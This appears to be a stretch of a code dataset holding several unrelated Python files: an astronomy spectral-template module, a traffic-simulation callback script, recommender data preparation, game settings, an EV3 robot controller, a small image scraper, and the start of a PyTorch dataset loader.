np.array(template_redshifts)\n \n # if verbose:\n # print(f'Redshift dependent! (NZ={self.NZ})')\n \n # Handle optional units\n if hasattr(self.wave, 'unit'):\n if self.wave.unit is not None:\n self.wave = self.wave.to(u.Angstrom).value\n else:\n self.wave = self.wave.data\n else:\n self.wave *= to_angstrom\n\n flam_unit = u.erg/u.second/u.cm**2/u.Angstrom\n \n if hasattr(self.flux, 'unit'):\n if self.flux.unit is not None:\n equiv = u.equivalencies.spectral_density(self.wave*u.Angstrom)\n flam = self.flux.to(flam_unit, equivalencies=equiv) \n self.flux = flam.value\n else:\n self.flux = self.flux.data\n \n # Smoothing \n if velocity_smooth > 0:\n self.smooth_velocity(velocity_smooth, in_place=True)\n \n # Resampling\n self.resample(resample_wave, in_place=True)\n \n #self.set_fnu()\n \n # Reddening function\n self.redfunc = redfunc\n _red = self.redden # test to break at init if fails\n \n def __repr__(self):\n if self.name is None:\n return self.__class__\n else:\n return '{0}: {1}'.format(self.__class__, self.name)\n \n #@property\n def absorbed_energy(self, i=0):\n diff = self.flux[i,:]*(1-self.redden)*(self.redden > 0)\n absorbed = np.trapz(diff, self.wave)\n return absorbed\n # if self.NZ == 1:\n # return absorbed[0]\n # else:\n # return absorbed\n \n @property\n def redden(self):\n \"\"\"\n Return multiplicative scaling from `self.redfunc`, which is expected\n to return attenuation in magnitudes.\n \"\"\"\n if self.redfunc is not None:\n red = self.redfunc(self.wave*u.Angstrom)\n else:\n red = 1.\n \n return red\n \n #@property \n def flux_fnu(self, i=0):\n \"\"\"\n self.flux is flam. Scale to fnu\n \"\"\"\n return self.flux[i,:] * self.wave**2 / (utils.CLIGHT*1.e10) * self.redden\n \n def set_fnu(self):\n \"\"\"\n Deprecated. `flux_fnu` is now a `@property`.\n \"\"\"\n pass\n #self.flux_fnu = self.flux * self.wave**2 / 3.e18\n \n def smooth_velocity(self, velocity_smooth, in_place=True, raise_error=False):\n \"\"\"\n Smooth template in velocity using `prospect`\n \"\"\"\n try:\n from prospect.utils.smoothing import smooth_vel\n except:\n if raise_error:\n raise ImportError(\"Couldn't import `prospect.utils.smoothing\")\n else:\n return None\n \n if velocity_smooth <= 0:\n if in_place:\n return True\n else:\n return self\n \n sm_flux = np.array([smooth_vel(self.wave, self.flux[i,:], self.wave, \n velocity_smooth) for i in range(self.NZ)])\n \n sm_flux[~np.isfinite(sm_flux)] = 0.\n \n if in_place:\n self.flux_orig = self.flux*1\n self.velocity_smooth = velocity_smooth\n self.flux = sm_flux\n return True\n else:\n return Template(arrays=(self.wave, sm_flux), \n name=self.name, meta=self.meta, \n template_redshifts=self.template_redshifts)\n \n def resample(self, new_wave, z=0, in_place=True, return_array=False, interp_func=utils.interp_conserve):\n \"\"\"\n Resample the template to a new wavelength grid\n \"\"\"\n import astropy.units as u\n \n breakme = False\n if isinstance(new_wave, str):\n if new_wave == 'None':\n breakme = True\n elif not os.path.exists(new_wave):\n msg = 'WARNING: new_wave={0} could not be found'\n print(msg.format(new_wave))\n breakme = True\n else:\n new_wave = np.loadtxt(new_wave)\n \n elif new_wave is None:\n breakme = True\n \n if breakme:\n if in_place:\n return False\n else:\n return self\n \n if hasattr(new_wave, 'unit'):\n new_wave = new_wave.to(u.Angstrom).value\n \n new_flux = [interp_func(new_wave, self.wave*(1+z), self.flux[i,:])\n for i in range(self.NZ)]\n new_flux = np.array(new_flux)\n \n if in_place:\n self.wave = new_wave*1\n self.flux = new_flux\n return True\n else:\n if return_array:\n return new_flux\n else:\n return Template(arrays=(new_wave, new_flux), \n name=self.name, meta=self.meta, \n template_redshifts=self.template_redshifts)\n \n def zindex(self, z=0., redshift_type='nearest'):\n \"\"\"\n Get the redshift index of a multi-dimensional template array\n \"\"\"\n #dz = z - self.template_redshifts\n \n zint = np.interp(z, self.template_redshifts, np.arange(self.NZ),\n left=0, right=self.NZ-1)\n \n if redshift_type == 'nearest':\n iz = np.round(zint).astype(int)\n else:\n iz = zint.astype(int)\n \n return iz\n \n def integrate_filter(self, filt, flam=False, scale=1., z=0, include_igm=False, redshift_type='nearest', iz=None):\n \"\"\"\n Integrate the template through a `FilterDefinition` filter object.\n \n The `grizli` interpolation module should be used if possible: \n https://github.com/gbrammer/grizli/\n \"\"\"\n try:\n import grizli.utils_c\n interp = grizli.utils_c.interp.interp_conserve_c\n except ImportError:\n interp = utils.interp_conserve\n \n if hasattr(filt, '__len__'):\n filts = filt\n single = False\n else:\n filts = [filt]\n single = True\n \n if include_igm > 0:\n igmz = self.igm_absorption(z, pow=include_igm)\n else:\n igmz = 1.\n \n # Fnu flux density, with IGM and scaling\n if iz is None:\n iz = self.zindex(z=z, redshift_type=redshift_type)\n \n fnu = self.flux_fnu(iz)*scale*igmz\n \n fluxes = []\n for filt_i in filts: \n templ_filt = interp(filt_i.wave, self.wave*(1+z),\n fnu, left=0, right=0)\n \n # f_nu/lam dlam == f_nu d (ln nu) \n integrator = np.trapz\n temp_int = integrator(filt_i.throughput*templ_filt/filt_i.wave, \n filt_i.wave) \n temp_int /= filt_i.norm\n \n if flam:\n temp_int *= utils.CLIGHT*1.e10/(filt_i.pivot/(1+z))**2\n \n fluxes.append(temp_int)\n \n if single:\n return fluxes[0]\n else:\n return np.array(fluxes)\n \n def igm_absorption(self, z, scale_tau=1., pow=1):\n \"\"\"\n Compute IGM absorption. \n \n `power` scales the absorption strength as `~eazy.igm.Inoue14()**pow`.\n \"\"\"\n try:\n from . import igm as igm_module\n except:\n from eazy import igm as igm_module\n \n igm = igm_module.Inoue14(scale_tau=scale_tau)\n igmz = self.wave*0.+1\n lyman = self.wave < 1300\n igmz[lyman] = igm.full_IGM(z, (self.wave*(1+z))[lyman])**pow\n return igmz\n \n def integrate_filter_list(self, filters, include_igm=True, norm_index=None, **kwargs):\n \"\"\"\n Integrate template through all filters\n \n filters: list of `~eazy.filters.Filter` objects\n \n [rewritten as simple wrapper]\n \"\"\" \n fluxes = self.integrate_filter(filters, include_igm=include_igm, \n **kwargs) \n if isinstance(norm_index, int):\n fluxes /= fluxes[norm_index]\n \n return fluxes\n \n def to_table(self, formats={'wave':'.5e', 'flux':'.5e'}, with_units=False, flatten=True):\n from astropy.table import Table\n import astropy.units as u\n import copy\n \n tab = Table()\n tab['wave'] = self.wave\n tab['flux'] = self.flux.T\n \n if with_units:\n tab['wave'].unit = u.Angstrom\n tab['flux'].unit = u.erg/u.second/u.cm**2/u.Angstrom\n\n for c in tab.colnames:\n if c in formats:\n tab[c].format = formats[c]\n \n tab.meta = copy.deepcopy(self.meta)\n if self.NZ > 1:\n tab.meta['NZ'] = self.NZ\n for j in range(self.NZ):\n tab.meta[f'Z{j}'] = self.template_redshifts[j]\n else:\n if flatten:\n tab['flux'] = self.flux[0,:]\n \n return tab\n \nclass ModifiedBlackBody():\n \"\"\"\n Modified black body: nu**beta * BB(nu) \n + FIR-radio correlation\n \n \n \"\"\"\n def __init__(self, Td=47, beta=1.6, q=2.34, alpha=-0.75):\n self.Td = Td\n self.q = q\n self.beta = beta\n self.alpha = alpha\n \n @property \n def bb(self):\n from astropy.modeling.models import BlackBody\n return BlackBody(temperature=self.Td*u.K)\n \n def __call__(self, wave, q=None):\n \"\"\"\n Return modified BlackBody (fnu) as a function of wavelength\n \"\"\"\n from astropy.constants import L_sun, h, k_B, c\n if not hasattr(wave, 'unit'):\n mu = wave*u.micron\n else:\n mu = wave\n \n nu = (c/mu).to(u.Hz).value\n mbb = (self.bb(nu)*nu**self.beta).value\n lim = (mu > 40*u.micron) & (mu < 120*u.micron) \n lir = np.trapz(mbb[lim][::-1], nu[lim][::-1])\n \n if q is None:\n q = self.q\n \n radio = 10**(np.log10(lir/3.75e12)-q)\n radio *= (nu/1.4e9)**self.alpha\n \n return (mbb+radio)\n \n def __repr__(self):\n label = r'$T_\\mathrm{{{{d}}}}$={0:.0f}, $\\beta$={1:.1f}'\n return label.format(self.Td, self.beta)\n\n\nPHOENIX_LOGG_FULL = [3.0, 3.5, 4.0, 4.5, 5.0, 5.5]\nPHOENIX_LOGG = [4.0, 4.5, 5.0, 5.5]\n\nPHOENIX_TEFF_FULL = [400.0, 420.0, 450.0, 500.0, 550.0, 600.0, 650.0, 700.0, 750.0, 800.0, 850.0, 900.0, 950.0, 1000.0, 1050.0, 1100.0, 1150.0, 1200.0, 1250.0, 1300.0, 1350.0, 1400.0, 1450.0, 1500.0, 1550.0, 1600.0, 1650.0, 1700.0, 1750.0, 1800.0, 1850.0, 1900.0, 1950.0, 2000.0, 2100.0, 2200.0, 2300.0, 2400.0, 2500.0, 2600.0, 2700.0, 2800.0, 2900.0, 3000.0, 3100.0, 3200.0, 3300.0, 3400.0, 3500.0, 3600.0, 3700.0, 3800.0, 3900.0, 4000.0, 4100.0, 4200.0, 4300.0, 4400.0, 4500.0, 4600.0, 4700.0, 4800.0, 4900.0, 5000.0]\n\nPHOENIX_TEFF = [400., 420., 450., 500., 550., 600., 650., 700., 750.,\n 800., 850., 900., 950., 1000., 1050., 1100., 1150., 1200.,\n 1300., 1400., 1500., 1600., 1700., 1800., 1900., 2000., 2100.,\n 2200., 2300., 2400., 2500., 2600., 2700., 2800., 2900., 3000.,\n 3100., 3200., 3300., 3400., 3500., 3600., 3700., 3800., 3900., 4000.,\n 4200., 4400., 4600., 4800., 5000., 5500., 5500, 6000., 6500., 7000.]\n\nPHOENIX_ZMET_FULL = [-2.5, -2.0, -1.5, -1.0, -0.5, -0., 0.5]\nPHOENIX_ZMET = [-1.0, -0.5, -0.]\n\ndef load_phoenix_stars(logg_list=PHOENIX_LOGG, teff_list=PHOENIX_TEFF, zmet_list=PHOENIX_ZMET, add_carbon_star=True, file='bt-settl_t400-7000_g4.5.fits'):\n \"\"\"\n Load Phoenix stellar templates\n \"\"\"\n try:\n from urllib.request import urlretrieve\n except:\n from urllib import urlretrieve\n\n from astropy.table import Table\n import astropy.io.fits as pyfits\n \n paths = ['/tmp', './templates/', './']\n hdu = None\n for path in paths:\n templ_path = os.path.join(path, file)\n if os.path.exists(templ_path):\n print(f'phoenix_templates: {templ_path}')\n hdu = pyfits.open(templ_path)\n break\n \n if hdu is None:\n url = 'https://s3.amazonaws.com/grizli/CONF'\n print('Fetch {0}/{1}'.format(url, file))\n\n #os.system('wget -O /tmp/{1} {0}/{1}'.format(url, file))\n res = urlretrieve('{0}/{1}'.format(url, file),\n filename=templ_path)\n\n hdu = pyfits.open(templ_path)\n\n tab = Table.read(hdu[1])\n\n tstars = []\n N = tab['flux'].shape[1]\n for i in range(N):\n teff = tab.meta['TEFF{0:03d}'.format(i)]\n logg = tab.meta['LOGG{0:03d}'.format(i)]\n if 'ZMET{0:03d}'.format(i) in tab.meta:\n met = tab.meta['ZMET{0:03d}'.format(i)]\n else:\n met = 0.\n\n if (logg not in logg_list) | (teff not in teff_list) | (met not in zmet_list):\n #print('Skip {0} {1}'.format(logg, teff))\n continue\n\n label = 'bt-settl_t{0:05.0f}_g{1:3.1f}_m{2:.1f}'.format(teff, logg, met)\n arrays = (tab['wave'], tab['flux'][:, i])\n tstars.append(Template(arrays=arrays, name=label, redfunc=None))\n\n cfile = 'templates/stars/carbon_star.txt'\n if add_carbon_star & os.path.exists(cfile):\n sp = Table.read(cfile, format='ascii.commented_header')\n if add_carbon_star > 1:\n import scipy.ndimage as nd\n cflux = nd.gaussian_filter(sp['flux'], add_carbon_star)\n else:\n cflux = sp['flux']\n\n tstars.append(Template(arrays=(sp['wave'], cflux), \n name='carbon-lancon2002'))\n\n return tstars\n \n# class TemplateInterpolator():\n# \"\"\"\n# Class to use scipy spline interpolator to interpolate pre-computed eazy template \n# photometry at arbitrary redshift(s).\n# \"\"\"\n# def __init__(self, bands=None, MAIN_OUTPUT_FILE='photz', OUTPUT_DIRECTORY='./OUTPUT', CACHE_FILE='Same', zout=None, f_lambda=True):\n# from scipy import interpolate\n# #import threedhst.eazyPy as eazy\n# \n# #### Read the files from the specified output\n# tempfilt, coeffs, temp_seds, pz = eazy.readEazyBinary(MAIN_OUTPUT_FILE=MAIN_OUTPUT_FILE, OUTPUT_DIRECTORY=OUTPUT_DIRECTORY, CACHE_FILE = CACHE_FILE)\n# \n# if bands is None:\n# self.bands = np.arange(tempfilt['NFILT'])\n# else:\n# self.bands = np.array(bands)\n# \n# self.band_names = ['' for b in self.bands]\n# \n# if zout is not None:\n# param = eazy.EazyParam(PARAM_FILE=zout.filename.replace('.zout','.param'))\n# self.band_names = [f.name for f in param.filters]\n# self.bands = np.array([f.fnumber-1 for f in param.filters])\n# \n# self.NFILT = len(self.bands)\n# self.NTEMP = tempfilt['NTEMP']\n# self.lc = tempfilt['lc'][self.bands]\n# self.sed = temp_seds\n# self.templam = self.sed['templam']\n# self.temp_seds = self.sed['temp_seds']\n# \n# # if True:\n# # import threedhst\n# # import unicorn\n# # threedhst.showMessage('Conroy model', warn=True)\n# # cvd12 = np.loadtxt(unicorn.GRISM_HOME+'/templates/cvd12_t11_solar_Chabrier.dat')\n# # self.temp_seds[:,0] = np.interp(self.templam, cvd12[:,0], cvd12[:,1])\n# \n# self.in_zgrid = tempfilt['zgrid']\n# self.tempfilt = tempfilt['tempfilt'][self.bands, :, :]\n# if f_lambda:\n# for i in range(self.NFILT):\n# self.tempfilt[i,:,:] /= (self.lc[i]/5500.)**2\n# \n# ###### IGM absorption\n# self.igm_wave = []\n# self.igm_wave.append(self.templam < 912)\n# self.igm_wave.append((self.templam >= 912) & (self.templam < 1026))\n# self.igm_wave.append((self.templam >= 1026) & (self.templam < 1216))\n# \n# self._spline_da = interpolate.InterpolatedUnivariateSpline(self.in_zgrid, temp_seds['da'])\n# self._spline_db = interpolate.InterpolatedUnivariateSpline(self.in_zgrid, temp_seds['db'])\n# \n# #### Make a 2D list of the spline interpolators\n# self._interpolators = [range(self.NTEMP) for i in range(self.NFILT)] \n# for i in range(self.NFILT):\n# for j in range(self.NTEMP):\n# self._interpolators[i][j] = interpolate.InterpolatedUnivariateSpline(self.in_zgrid, self.tempfilt[i, j, :])\n# #\n# self.output = None\n# self.zout = None\n# \n# def interpolate_photometry(self, zout):\n# \"\"\"\n# Interpolate the EAZY template photometry at `zout`, which can be a number or an \n# array.\n# \n# The result is returned from the function and also stored in `self.output`.\n# \"\"\" \n# output = [range(self.NTEMP) for i in range(self.NFILT)] \n# for i in range(self.NFILT):\n# for j in range(self.NTEMP):\n# output[i][j] = self._interpolators[i][j](zout)\n# \n# self.zgrid = np.array(zout)\n# self.output = np.array(output)\n# return self.output\n# \n# def check_extrapolate(self):\n# \"\"\"\n# Check if any interpolated values are extrapolated from the original redshift grid\n# \n# Result is both returned and stored in `self.extrapolated`\n# \"\"\"\n# if self.zout is None:\n# return False\n# \n# self.extrapolated = np.zeros(self.output.shape, dtype=np.bool) ## False\n# \n# bad = (self.zgrid < self.in_zgrid.min()) | (self.zgrid > self.in_zgrid.max())\n# self.extrapolated[:, :, bad] = True\n# \n# return self.extrapolated\n# \n# def get_IGM(self, z, matrix=False, silent=False):\n# \"\"\"\n# Retrieve the full SEDs with IGM absorption\n# \"\"\"\n# ###### IGM absorption\n# # lim1 = self.templam < 912\n# # lim2 = (self.templam >= 912) & (self.templam < 1026)\n# # lim3 = (self.templam >= 1026) & (self.templam < 1216)\n# \n# igm_factor = np.ones(self.templam.shape[0])\n# igm_factor[self.igm_wave[0]] = 0.\n# igm_factor[self.igm_wave[1]] = 1. - self._spline_db(z)\n# igm_factor[self.igm_wave[1]] = 1. - self._spline_da(z)\n# \n# if matrix:\n# self.igm_factor = np.dot(igm_factor.reshape(-1,1), np.ones((1, self.NTEMP)))\n# else:\n# self.igm_factor = igm_factor\n# \n# self.igm_z = z\n# self.igm_lambda = self.templam*(1+z)\n# \n# if not silent:\n# return self.igm_lambda, self.igm_factor\n\ndef param_table(templates):\n \"\"\"\n Try to generate parameters for a list of templates from their \n metadata\n \n (TBD)\n \"\"\"\n pass\n\n\ndef bspline_templates(wave, degree=3, df=6, get_matrix=True, log=False, clip=1.e-4, minmax=None):\n \"\"\"\n B-spline basis functions, modeled after `~patsy.splines`\n \"\"\"\n from collections import OrderedDict\n from scipy.interpolate import splev\n\n order = degree+1\n n_inner_knots = df - order\n inner_knots = np.linspace(0, 1, n_inner_knots + 2)[1:-1]\n\n norm_knots = np.concatenate(([0, 1] * order,\n inner_knots))\n norm_knots.sort()\n\n if log:\n xspl = np.log(wave)\n else:\n xspl = wave*1\n\n if minmax is None:\n mi = xspl.min()\n ma = xspl.max()\n else:\n mi, ma = minmax\n\n width = ma-mi\n all_knots = norm_knots*width+mi\n\n n_bases = len(all_knots) - (degree + 1)\n basis = np.empty((xspl.shape[0], n_bases), dtype=float)\n\n coefs = np.identity(n_bases)\n basis = splev(xspl, (all_knots, coefs, degree))\n\n for i in range(n_bases):\n out_of_range = (xspl < mi) | (xspl > ma)\n basis[i][out_of_range] = 0\n\n wave_peak = np.round(wave[np.argmax(basis, axis=1)])\n\n maxval = np.max(basis, axis=1)\n for i in range(n_bases):\n basis[i][basis[i] < clip*maxval[i]] = 0\n\n if get_matrix:\n return np.vstack(basis).T\n\n temp = OrderedDict()\n for i in range(n_bases):\n key = 'bspl {0} {1:.0f}'.format(i, wave_peak[i])\n temp[key] = Template(arrays=(wave*1., basis[i]), name=key, \n meta={'wave_peak':wave_peak[i]})\n #temp[key].name = key\n #temp[key].wave_peak = wave_peak[i]\n\n temp.knots = all_knots\n temp.degree = degree\n temp.xspl = xspl\n\n return temp\n\n\ndef gaussian_templates(wave, centers=[], widths=[], norm=False):\n \"\"\"\n Make Gaussian \"templates\" for the template correction\n \"\"\"\n _x = np.array([1/np.sqrt(2*np.pi*w**2)**norm*np.exp(-(wave-c)**2/2/w**2) \n for c, w in zip(centers, widths)])\n return _x.T\n\n\n \n ","sub_path":"eazy/templates.py","file_name":"templates.py","file_ext":"py","file_size_in_byte":31632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"247697821","text":"from AAPI import *\nfrom angParams import ResultFileName\nfrom secIDs_table import secIDs\nfrom secSourceIDs_table import secSourceIDs\nfrom AllSections import AllSections\nimport sys\nimport csv\n# the file angParams.py is in the TR/PyInputs directory\n# we only record events after the warmupPeriod (900sec ie 15min)\nmatrixFilePath = 'C:/Users/Krishna/Dropbox/CriticalOD/PythonFiles/ODpairsListForResult.txt'\n#global variables\nfile2 = 0\ntotNbVeh = 0\ntotTT = 0 \n\ndef AAPILoad():\n\treturn 0\n\ndef AAPIInit():\n\t#AKIPrintString( \"AAPIInit\" )\n\treturn 0\n\ndef AAPIManage(time, timeSta, timeTrans, acycle):\n\treturn 0\n\ndef AAPIPostManage(time, timeSta, timeTrans, acycle):\n\treturn 0\n\ndef AAPIFinish():\n\tglobal file2\n\tglobal totExtraVeh\n\t#AKIPrintString( \"AAPIFinish\" )\n\n\t#Get the average link travel time deviation\n\tnbSecs = len(AllSections)\n\tSumTravelTimeDeviation = 0\n\tSumLinkVehicles = 0\n\tfor secIter in range(0,nbSecs):\n\t\tcurrSecID = AllSections[secIter] \n\t\tsectStruct = AKIEstGetGlobalStatisticsSection(currSecID,0)\n\t\tcurrTime = sectStruct.TTd\n\t\tcurrNbVeh = sectStruct.Flow\n\t\tSumTravelTimeDeviation = SumTravelTimeDeviation + currTime*currNbVeh\n\t\tSumLinkVehicles = SumLinkVehicles + currNbVeh;\n\tAvgLinkTTDeviation = (SumTravelTimeDeviation/60)/(SumLinkVehicles)\n\n\tcrs = open(matrixFilePath, \"r\")\n\titer = 0;\n\tfor columns in ( raw.strip().split() for raw in crs ): \n\t\titer = iter+1;\n\tmatrix = [[0]*2 for i in range(iter)]\n\tcrs.closed\n\tcrs = open(matrixFilePath, \"r\")\n\n\tSumODTravelTimeDeviation = 0\n\tSumODLinkVehicles = 0\n\titer = 0;\n\tfor columns in ( raw.strip().split() for raw in crs ):\n\t\tmatrix[iter][0]=int(columns[0])\n\t\tmatrix[iter][1]=int(columns[1])\n\t\titer = iter+1;\n\tcrs.closed\n\n\t#for ODIter in range(0,iter):\n\tODStruct = AKIEstGetGlobalStatisticsODPair(3695,3753, 0)\n\t#SumODTravelTimeDeviation = SumODTravelTimeDeviation + ODStruct.TTa\n\t#SumODLinkVehicles = SumODLinkVehicles + ODStruct.Flow\n\t#AvgODTTDeviation = (SumODTravelTimeDeviation/60)/(iter)\n\n\tfile2 = open(ResultFileName, 'a')\n\tfile2.write('%f %f %f %f %d\\n'%(totTT/(totNbVeh*60),0,AvgLinkTTDeviation,ODStruct.TTa,ODStruct.report))\n\tfile2.close()\n\n\treturn 0\n\ndef AAPIUnLoad():\n\treturn 0\n\t\ndef AAPIPreRouteChoiceCalculation(time, timeSta):\n\treturn 0\n\n\n############################################################################\n\ndef AAPIEnterVehicle( a_nVehId, a_nSectionId ):\n\tAKIVehSetAsTracked( a_nVehId )\n\treturn 0\n\n\n############################################################################\n\ndef AAPIExitVehicle( a_nVehId, a_nSectionId ):\n\tglobal totNbVeh\n\tglobal totTT\n\tif (AKIGetCurrentSimulationTime()>900):\n\t\tinfVeh = AKIVehTrackedGetInf( a_nVehId )\n\t\tAKIVehSetAsNoTracked( a_nVehId )\n\t\ttotNbVeh = totNbVeh+1\n\t\ttotTT = totTT + (AKIGetCurrentSimulationTime()-infVeh.SystemEntranceT)\n\treturn 0\n\n\n\n############################################################################\n####\n\n","sub_path":"PythonFiles/GetAvgLinkVar.py","file_name":"GetAvgLinkVar.py","file_ext":"py","file_size_in_byte":2843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"490096597","text":"import os\nimport json\n\nUser_Feature = 'ECommAI_ubp_round1_user_feature'\nItem_Feature = 'ECommAI_ubp_round1_item_feature'\nUser_Item = 'ECommAI_ubp_round1_train'\nTest = 'ECommAI_ubp_round1_test'\nData_Path = '../data'\nOut_Path = '../data'\n\n\ndef generate_index():\n \"\"\"\n 输出文件:\n user_lookup: 用户编号 原始uid\n test_out_uid: 在测试文件中出现,但在用户资料中没有出现的用户(用户编号 原始uid)\n item_lookup: 物品编号 原始id\n index_train: ECommAI_ubp_round1_train中user id和item id转换为对应编号之后的记录,\n 丢弃了没有在用户资料和测试文件中出现的用户及没有在物品资料中出现的物品\n abnormal_uid: ECommAI_ubp_round1_train中没有在用户资料和测试文件中出现的用户的记录\n abnormal_iid: ECommAI_ubp_round1_train中没有在物品资料中出现的物品的记录\n \"\"\"\n user_dict = {}\n item_dict = {}\n index = 0\n print('生成User Index...')\n with open(User_Feature, 'r') as f_u, open(os.path.join(Out_Path, 'user_lookup'), 'w') as o_f_u:\n for line in f_u:\n uid = int(line.split()[0])\n user_dict[uid] = index\n o_f_u.write('%d\\t%d\\n' % (index, uid))\n index += 1\n # 找出在测试文件中出现,但在用户资料中不存在的记录\n with open(Test, 'r') as o_f_tu, open(os.path.join(Out_Path, 'test_out_uid'), 'w') as o_f_tou:\n for line in o_f_tu:\n tuid = int(line.split()[0])\n if tuid not in user_dict:\n user_dict[tuid] = index\n o_f_u.write('%d\\t%d\\n' % (index, tuid))\n o_f_tou.write('%d\\t%d\\n' % (index, tuid))\n index += 1\n print('Out Range User: %d' % tuid)\n print('生成Item Index...')\n with open(Item_Feature, 'r') as f_i, open(os.path.join(Out_Path, 'item_lookup'), 'w') as o_f_i:\n for line in f_i:\n iid = int(line.split()[0])\n item_dict[iid] = index\n o_f_i.write('%d\\t%d\\n' % (index, iid))\n index += 1\n print('生成User-Item...')\n with open(User_Item, 'r') as f_ui, open(os.path.join(Out_Path, 'index_train'), 'w') as o_f_ui, \\\n open(os.path.join(Out_Path, 'abnormal_uid'), 'w') as o_f_au, \\\n open(os.path.join(Out_Path, 'abnormal_iid'), 'w') as o_f_ai:\n abnormal_uid, abnormal_iid, normal_count = 0, 0, 0\n for line in f_ui:\n fields = line.split()\n uid, iid = int(fields[0]), int(fields[1])\n if uid not in user_dict:\n abnormal_uid += 1\n o_f_au.write(line)\n continue\n if iid not in item_dict:\n abnormal_iid += 1\n o_f_ai.write(line)\n continue\n fields[0] = str(user_dict[uid])\n fields[1] = str(item_dict[iid])\n o_f_ui.write('\\t'.join(fields)+'\\n')\n normal_count += 1\n print('正常记录:%d 用户缺失丢弃的记录:%d 物品缺失丢失的记录:%d' % (normal_count, abnormal_uid, abnormal_iid))\n\n\ndef generate_meta():\n print('生成元信息...')\n meta = {\n \"node_type_num\": 2,\n \"edge_type_num\": 4,\n \"node_uint64_feature_num\": 0,\n \"node_float_feature_num\": 0,\n \"node_binary_feature_num\": 0,\n \"edge_uint64_feature_num\": 0,\n \"edge_float_feature_num\": 0,\n \"edge_binary_feature_num\": 0\n }\n with open(os.path.join(Out_Path, 'meta'), 'w') as o_f_m:\n json.dump(meta, o_f_m, indent=4)\n\n\nif __name__ == \"__main__\":\n User_Feature = os.path.join(Data_Path, User_Feature)\n Item_Feature = os.path.join(Data_Path, Item_Feature)\n User_Item = os.path.join(Data_Path, User_Item)\n Test = os.path.join(Data_Path, Test)\n #generate_index()\n generate_meta()\n","sub_path":"data_process/prepare.py","file_name":"prepare.py","file_ext":"py","file_size_in_byte":3928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"539195853","text":"class Settings:\r\n \"\"\"\r\n Класс для хранения всех настроек игры Alien Invasion.\r\n \"\"\"\r\n def __init__(self):\r\n \"\"\"Инициализирует настройки\"\"\"\r\n # screen settings\r\n self.screen_width = 1200\r\n self.screen_height = 800\r\n self.bg_color = (230, 230, 230)\r\n # bullet settings\r\n self.bullet_speed_factor = 0.5\r\n self.bullets_allowed = 3\r\n self.bullet_width = 3\r\n self.bullet_height = 7\r\n self.bullet_color = (255, 60, 60)\r\n # ship settings\r\n self.ship_speed_factor = 0.5\r\n","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"275385961","text":"#!/usr/bin/env python3\n\n\nfrom threading import Thread\n\nfrom track3r_ev3dev1 import Track3r\n\n\nclass Track3rWithGrippingClaw(Track3r):\n is_gripping = False\n \n def grip_or_release_claw_by_ir_beacon(\n self,\n speed: float = 1000 # deg/s\n ):\n while True:\n if self.remote_control.beacon:\n if self.is_gripping:\n self.medium_motor.run_forever(speed_sp=-speed)\n\n self.speaker.play(wav_file='/home/robot/sound/Air release.wav').wait()\n\n self.is_gripping = False\n\n else:\n self.medium_motor.run_forever(speed_sp=speed)\n\n self.speaker.play(wav_file='/home/robot/sound/Airbrake.wav').wait()\n\n self.is_gripping = True\n\n while self.remote_control.beacon:\n pass\n\n\n def main(self,\n speed: float = 1000 # deg/s\n ):\n Thread(target=self.grip_or_release_claw_by_ir_beacon).start()\n \n self.keep_driving_by_ir_beacon(speed=speed)\n\n \nif __name__ == '__main__':\n TRACKER_WITH_GRIPPING_CLAW = Track3rWithGrippingClaw()\n\n TRACKER_WITH_GRIPPING_CLAW.main()\n","sub_path":"Computing-Platforms/EV3/Home-Edition/Core-Robots/Track3r/Track3r-3-with-Gripping-Claw.EV3Dev1.Threading.py","file_name":"Track3r-3-with-Gripping-Claw.EV3Dev1.Threading.py","file_ext":"py","file_size_in_byte":1222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"199707565","text":"import urllib.request\nimport urllib.parse\nimport re\nimport time\n\n\ndef getHtml(url, header):\n request = urllib.request.Request(url, headers = header)\n response = urllib.request.urlopen(request)\n html = response.read().decode(\"gbk\")\n\n return html\n\ndef getaddressofpic(html):\n r_key = \"\\\"(.*?)\\\"\"\n key = re.compile(r_key)\n\n piclist = re.findall(key, html)\n\n return piclist\n\ndef saving(piclist):\n for each in piclist:\n address = each[1]\n name = each[0]\n print(name)\n print(address)\n urllib.request.urlretrieve(address, \"/Users/wangguibin/Desktop/%s.jpg\"%name)\n\n\ndef paqu():\n for num in range(5550, 5580):\n if num % 10 != 3:\n url = \"http://www.meizitu.com/a/\" + str(num) + \".html\"\n\n header = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134\"}\n\n html = getHtml(url, header)\n\n piclist = getaddressofpic(html)\n\n saving(piclist)\n\n\n else:\n url = \"http://www.meizitu.com/a//\" + str(num) + \".html\"\n\n header = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134\"}\n\n html = getHtml(url, header)\n\n piclist = getaddressofpic(html)\n\n saving(piclist)\n\n time.sleep(60)\n\n\nif __name__ == \"__main__\":\n paqu()\n\n\nprint(\"爬取成功!\")\n","sub_path":"爬虫参考/netmeizitu.py","file_name":"netmeizitu.py","file_ext":"py","file_size_in_byte":1530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"621516938","text":"import os\r\nimport glob\r\nfrom PIL import Image\r\nfrom torch.utils.data import Dataset, DataLoader\r\nfrom torchvision import transforms\r\nfrom preprocessing import Equalizer\r\n\r\ntransform_default = transforms.Compose([\r\n transforms.Resize((256, 256)),\r\n Equalizer(),\r\n transforms.ToTensor(),\r\n# transforms.Normalize(mean=[0.485, 0.456, 0.406],\r\n# std=[0.229, 0.224, 0.225])\r\n ])\r\n\r\n\r\nclass DatasetFromDir(Dataset):\r\n def __init__(self, root_dir, size=None, transform=None):\r\n self.root_dir = root_dir\r\n filename_all = glob.glob(self.root_dir+'/**/*.jpg')\r\n if size:\r\n size = min(size, len(filename_all))\r\n self.filename_all = 